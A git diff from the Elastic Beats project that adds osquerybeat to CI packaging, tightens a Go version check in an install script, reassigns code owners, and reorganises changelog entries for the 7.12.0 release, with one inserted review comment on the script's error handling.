diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index a1e1ffbae3a..6b41838ce45 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -115,6 +115,7 @@ pipeline { 'x-pack/heartbeat', // 'x-pack/journalbeat', 'x-pack/metricbeat', + 'x-pack/osquerybeat', 'x-pack/packetbeat', 'x-pack/winlogbeat' ) @@ -290,6 +291,8 @@ def pushCIDockerImages(Map args = [:]) { tagAndPush(beatName: 'journalbeat', arch: arch) } else if (env?.BEATS_FOLDER?.endsWith('metricbeat')) { tagAndPush(beatName: 'metricbeat', arch: arch) + } else if (env?.BEATS_FOLDER?.endsWith('osquerybeat')) { + tagAndPush(beatName: 'osquerybeat', arch: arch) } else if ("${env.BEATS_FOLDER}" == "packetbeat"){ tagAndPush(beatName: 'packetbeat', arch: arch) } else if ("${env.BEATS_FOLDER}" == "x-pack/elastic-agent") { diff --git a/.ci/scripts/install-go.sh b/.ci/scripts/install-go.sh index eb31aee8433..31566c08726 100755 --- a/.ci/scripts/install-go.sh +++ b/.ci/scripts/install-go.sh @@ -11,13 +11,15 @@ GVM_CMD="${HOME}/bin/gvm" if command -v go then + set +e echo "Found Go. Checking version.." FOUND_GO_VERSION=$(go version|awk '{print $3}'|sed s/go//) - if [ $FOUND_GO_VERSION == $GO_VERSION ] + if [ "$FOUND_GO_VERSION" == "$GO_VERSION" ] then echo "Versions match. No need to install Go. Exiting." exit 0 fi + set -e fi if [ "${ARCH}" == "aarch64" ] ; then diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index b33de28e355..592495030dc 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -13,12 +13,12 @@ # /winlogbeat/ @elastic/beats # Auditbeat -/auditbeat/module/ @elastic/siem -/x-pack/auditbeat/ @elastic/siem +/auditbeat/module/ @elastic/security-external-integrations +/x-pack/auditbeat/ @elastic/security-external-integrations # Packetbeat -/packetbeat/protos/ @elastic/siem -/x-pack/packetbeat/ @elastic/siem +/packetbeat/protos/ @elastic/security-external-integrations +/x-pack/packetbeat/ @elastic/security-external-integrations # Filebeat # /filebeat/module/ @elastic/integrations 
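Review bot: The added `set +e` / `set -e` pair around the version check in install-go.sh carries no comment saying which command it is meant to tolerate, and the closing `set -e` switches errexit on unconditionally instead of restoring the earlier state. Whether the script enables errexit before this point is outside the hunk. A one-line comment above `set +e` would record the intent, e.g. `# a broken or partial Go install must not abort the script; fall through to the gvm install below`. Note also that the early `exit 0` trusts the self-reported version of whichever `go` is first on PATH, so on shared workers the match says nothing about where that toolchain came from. The quoting fix on the `[ "$FOUND_GO_VERSION" == "$GO_VERSION" ]` test is good, since an empty value now compares as false instead of raising a syntax error.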
@@ -26,7 +26,7 @@
 # /filebeat/module/kibana/ @elastic/stack-monitoring
 # /filebeat/module/logstash/ @elastic/stack-monitoring
 # /x-pack/filebeat/module/ @elastic/integrations
-# /x-pack/filebeat/module/suricata/ @elastic/secops
+# /x-pack/filebeat/module/suricata/ @elastic/security-external-integrations
 # Metricbeat
 # /metricbeat/module/ @elastic/integrations
@@ -40,7 +40,7 @@
 /heartbeat/ @elastic/uptime
 # Winlogbeat
-/x-pack/winlogbeat/ @elastic/siem
+/x-pack/winlogbeat/ @elastic/security-external-integrations
 # CI Specific
 /.ci/ @elastic/observablt-robots
diff --git a/CHANGELOG-developer.next.asciidoc b/CHANGELOG-developer.next.asciidoc
index d34704ecaac..8dbeb193b79 100644
--- a/CHANGELOG-developer.next.asciidoc
+++ b/CHANGELOG-developer.next.asciidoc
@@ -110,3 +110,4 @@ The list below covers the major changes between 7.0.0-rc2 and master only.
 - Update Go version to 1.15.7. {pull}22495[22495]
 - Update Go version to 1.15.8. {pull}23955[23955]
 - Update Go version to 1.15.9. {pull}24442[24442]
+- Update Go version to 1.15.10. {pull}24606[24606]
diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc
index 51c0f1f8aea..68d0f9291af 100644
--- a/CHANGELOG.asciidoc
+++ b/CHANGELOG.asciidoc
@@ -3,6 +3,166 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.12.0]] +=== Beats version 7.12.0 +https://github.com/elastic/beats/compare/v7.11.2...v7.12.0[View commits] + +==== Breaking changes + +*Filebeat* + +- Rename `s3` input to `aws-s3` input. {pull}23469[23469] + +*Heartbeat* + +- Refactor synthetics configuration to new syntax. {pull}23467[23467] + +==== Bugfixes + +*Affecting all Beats* + +- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] +- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix panic with inline SSL when the certificate or key was smaller than 256 bytes. {issue}23820[23820] {pull}23858[23858] + +*Auditbeat* + +- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] +- system/login: Add additional offset check for utmp files. {pull}24515[24515] + +*Filebeat* + +- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] +- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] +- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] +- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] +- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] +- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] +- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] +- Update `filestream` reader offset when a line is skipped. 
{pull}23417[23417] +- Add check for empty values in azure module. {pull}24156[24156] +- Change the `event.created` in Netflow events to be the time the event was created by Filebeat +- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] +- Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] +- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] +- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] + +*Metricbeat* + +- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] +- Unskip s3_request integration test. {pull}23887[23887] +- Add system.hostfs configuration option for system module. {pull}23831[23831] + +==== Added + +*Affecting all Beats* + +- Honor kube event resysncs to handle missed watch events {pull}22668[22668] +- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] +- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] +- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] +- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] +- Add kubernetes.volume.fs.used.pct field. 
{pull}23564[23564] +- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] +- Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] +- Add `selector` information in Kubernetes services' metadata. {pull}23730[23730] + +*Auditbeat* + +- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] + +*Filebeat* + +- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] +- Added support for first_event context in Filebeat httpjson input {pull}23437[23437] +- Adding Threat Intel module {pull}21795[21795] +- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] +- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by removing unsupported processors. {pull}23763[23763] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] +- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] +- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] +- Populate `source.mac` and `destination.mac` for Suricata EVE events. 
{issue}23706[23706] {pull}23721[23721] +- Added string splitting for httpjson input {pull}24022[24022] +- Added Signatures fileset to Zeek module {pull}23772[23772] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ECS 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ECS 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ECS 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] +- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] + +*Heartbeat* + +- Bundle synthetics dependencies with Heartbeat docker image. 
{pull}23274[23274] + +*Heartbeat* + +- Update Journalbeat to ECS 1.8. {pull}23737[23737] + +*Metricbeat* + +- Enrich events of `state_service` metricset with Kubernetes services' metadata. {pull}23730[23730] +- Add support for Darwin/arm M1. {pull}24019[24019] +- Check fields are documented in AWS metricsets. {pull}23887[23887] +- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}23905[23905] + +*Packetbeat* + +- Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] + +*Functionbeat* + +- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] +- Add support for multiple regions {pull}21065[21065] + +*Heartbeat* + +- Add support for script processor. {pull}23229[23229] + +*Winlogbeat* + +- Add Audit and Authentication Policy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] +- Remove deprecated eventlogging API that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] + +==== Deprecated + +*Affecting all Beats* + +- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as a hostname when Subject Alternative Name is not present from v8.0. Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new major version of Beats. + + [[release-notes-7.11.2]] === Beats version 7.11.2 https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 44ddadada89..93bae39ef96 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc 
@@ -31,8 +31,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - API address is a required setting in `add_cloudfoundry_metadata`. {pull}21759[21759] - Update to ECS 1.7.0. {pull}22571[22571] - Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] -- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] - Use alias to report container image in k8s metadata. {pull}24380[24380] +- Set `cleanup_timeout` to zero by default in docker and kubernetes autodiscover in all beats except Filebeat where it is kept to 60 seconds. {pull}24681[24681] +- Update to ECS 1.9.0. {pull}24909[24909] *Auditbeat* @@ -49,7 +50,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Filebeat* -- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] 
@@ -103,12 +103,10 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Rename bad ECS field name tracing.trace.id to trace.id in aws elb fileset. {pull}22571[22571] - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] -- Rename `s3` input to `aws-s3` input. {pull}23469[23469] - Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] +- Add User Agent Parser for Azure Sign In Logs Ingest Pipeline {pull}23201[23201] *Heartbeat* -- Adds negative body match. {pull}20728[20728] -- Refactor synthetics configuration to new syntax. {pull}23467[23467] *Journalbeat* 
@@ -234,14 +232,14 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] - Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] - Fix typo in config docs {pull}23185[23185] -- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] -- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] - Add FAQ entry for madvdontneed variable {pull}23429[23429] - Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] - Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] -- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix ILM setup log reporting that a policy or an alias was created, even though the creation of any resource was disabled. {issue}24046[24046] {pull}24480[24480] +- Fix ILM alias not being created if `setup.ilm.check_exists: false` and `setup.ilm.overwrite: true` has been configured. {pull}24480[24480] - Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] - Allow cgroup self-monitoring to see alternate `hostfs` paths {pull}24334[24334] +- Fix 'make setup' instructions for a new beat {pull}24944[24944] *Auditbeat* 
@@ -263,8 +261,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - system/socket: Fixed start failure when run under config reloader. {issue}20851[20851] {pull}21693[21693] - system/socket: Having some CPUs unavailable to Auditbeat could cause startup errors or event loss. {pull}22827[22827] - Note incompatibility of system/socket on ARM. {pull}23381[23381] -- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] -- system/login: Add additional offset check for utmp files. {pull}24515[24515] *Filebeat* 
@@ -280,17 +276,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix a connection error in httpjson input. {pull}16123[16123] - Fix integer overflow in S3 offsets when collecting very large files. {pull}22523[22523] - Fix CredentialsJSON unpacking for `gcp-pubsub` and `httpjson` inputs. {pull}23277[23277] -- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] -- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] -- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] -- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] -- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] -- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] -- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] -- Change the `event.created` in Netflow events to be the time the event was created by Filebeat - to be consistent with ECS. {pull}23094[23094] -- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Add check for empty values in azure module. {pull}24156[24156] *Filebeat* 
@@ -373,11 +358,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix checkpoint module when logs contain time field. {pull}20567[20567] - Add field limit check for AWS Cloudtrail flattened fields. {pull}21388[21388] {issue}21382[21382] - Fix syslog RFC 5424 parsing in the CheckPoint module. {pull}21854[21854] -- Add json body check for sqs message. {pull}21727[21727] - Fix incorrect connection state mapping in zeek connection pipeline. {pull}22151[22151] {issue}22149[22149] - Fix handing missing eventtime and assignip field being set to N/A for fortinet module. {pull}22361[22361] - Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] - Fix for `field [source] not present as part of path [source.ip]` error in azure pipelines. {pull}22377[22377] +- Properly update offset in case of unparasable line. {pull}22685[22685] - Drop aws.vpcflow.pkt_srcaddr and aws.vpcflow.pkt_dstaddr when equal to "-". {pull}22721[22721] {issue}22716[22716] - Fix cisco umbrella module config by adding input variable. {pull}22892[22892] - Fix network.direction logic in zeek connection fileset. {pull}22967[22967] 
@@ -389,26 +374,24 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Simplify regex for organization custom prefix in AWS/CloudTrail fileset. {issue}23203[23203] {pull}23204[23204] - Fix syslog header parsing in infoblox module. {issue}23272[23272] {pull}23273[23273] - Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] -- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] -- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] -- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] -- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] -- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] -- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] -- Fix Netflow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] -- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] -- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] +- Fix Cisco ASA parser for message 722051. {pull}24410[24410] +- Fix `google_workspace` pagination. {pull}24668[24668] +- Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix Cisco AMP `@metadata._id` calculation {issue}24717[24717] {pull}24718[24718] +- Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] +- Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] +- Fix date parsing in GSuite/login fileset. 
{issue}24694[24694] +- Improve Cisco ASA/FTD parsing of messages - better support for identity FW messages. Change network.bytes, source.bytes, and destination.bytes to long from integer since value can exceed integer capacity. Add descriptions for various processors for easier pipeline editing in Kibana UI. {pull}23766[23766] +- Updating Oauth2 flow for m365_defender fileset. {pull}24829[24829] +- Improve PanOS parsing and ingest pipeline. {issue}22413[22413] {issue}22748[22748] {pull}24799[24799] *Heartbeat* - Fixed excessive memory usage introduced in 7.5 due to over-allocating memory for HTTP checks. {pull}15639[15639] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -*Heartbeat* - - *Journalbeat* 
@@ -514,14 +497,13 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] - Change vsphere.datastore.capacity.used.pct value to betweeen 0 and 1. {pull}23148[23148] +- Fix incorrect types of fields GetHits and Ops in NodeInterestingStats for Couchbase module in Metricbeat {issue}21021[21021] {pull}23287[23287] - Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] -- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] -- Unskip s3_request integration test. {pull}23887[23887] -- Add system.hostfs configuration option for system module. {pull}23831[23831] - Fix GCP not able to request Cloudfunctions metrics if a region filter was set {pull}24218[24218] - Fix type of `uwsgi.status.worker.rss` type. {pull}24468[24468] +- Ignore unsupported derive types for filesystem metricset. {issue}22501[22501] {pull}24502[24502] +- Accept text/plain type by default for prometheus client scraping. {pull}24622[24622] *Packetbeat* 
@@ -616,17 +598,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] - Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] - Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] -- Honor kube event resysncs to handle missed watch events {pull}22668[22668] -- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] -- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] -- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] -- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] -- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] -- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] -- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] -- Add deployment name in pod's meta. {pull}23610[23610] -- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] -- Add `selector` information in kubernetes services' metadata. {pull}23730[23730] +- Add `wineventlog` schema to `decode_xml` processor. {issue}23910[23910] {pull}24726[24726] *Auditbeat* 
@@ -644,11 +616,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add file integrity module ECS categorization fields. {pull}18012[18012] - Add `file.mime_type`, `file.extension`, and `file.drive_letter` for file integrity module. {pull}18012[18012] - Add ECS categorization info for auditd module {pull}18596[18596] -- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] -- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] -- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] -- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] -- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* 
@@ -843,56 +810,25 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] - Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] - Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] -- Added support for first_event context in filebeat httpjson input {pull}23437[23437] -- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] - Added `alternative_host` option to google pubsub input {pull}23215[23215] -- Adding Threat Intel module {pull}21795[21795] -- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] -- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] -- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] -- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] -- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] -- Move aws-s3 input to GA. {pull}23631[23631] -- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] -- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by - removing unsupported processors. {pull}23763[23763] -- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] -- Added string splitting for httpjson input {pull}24022[24022] -- Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] -- Added Signatures fileset to Zeek module {pull}23772[23772] -- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. 
{pull}23819[23819] -- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] -- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] -- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] -- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] -- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] -- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] -- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] -- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] -- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] -- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] -- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] -- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] -- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] -- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] -- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] -- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] -- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] -- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] -- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] - Support X-Forwarder-For in IIS logs. {pull}19142[192142] - +- Add support for logs generated by servers configured with `log_statement` and `log_duration` in PostgreSQL module. {pull}24607[24607] +- Updating field mappings for Cisco AMP module, fixing certain fields. {pull}24661[24661] +- Added NTP fileset to Zeek module {pull}24224[24224] +- Add `proxy_url` config for httpjson v2 input. 
{issue}24615[24615] {pull}24662[24662] +- Add support for upper case field names in Sophos XG module {pull}24693[24693] +- Add `fail_on_template_error` option for httpjson input. {pull}24784[24784] +- Change `okta.target` to `flattened` field type. {issue}24354[24354] {pull}24636[24636] *Heartbeat* - Add mime type detection for http responses. {pull}22976[22976] -- Bundle synthetics deps with heartbeat docker image. {pull}23274[23274] - Handle datastreams for fleet. {pull}24223[24223] - Add --sandbox option for browser monitor. {pull}24172[24172] +- Support additional 'root' fields from synthetics. {pull}24770[24770] *Journalbeat* -- Update Journalbeat to ECS 1.8. {pull}23737[23737] *Metricbeat* @@ -1013,11 +949,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] - Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] - Release MSSQL as GA {pull}23146[23146] -- Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] -- Add support for Darwin/arm M1. {pull}24019[24019] -- Check fields are documented in aws metricsets. {pull}23887[23887] -- Add support for defining metrics_filters for prometheus module in hints. {pull}24264[24264] -- Add support for PostgreSQL 10, 11, 12 and 13. {pull}24402[24402] +- Add support for SASL/SCRAM authentication to the Kafka module. {pull}24810[24810] *Packetbeat* @@ -1032,6 +964,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] - Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] - Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] *Functionbeat* 
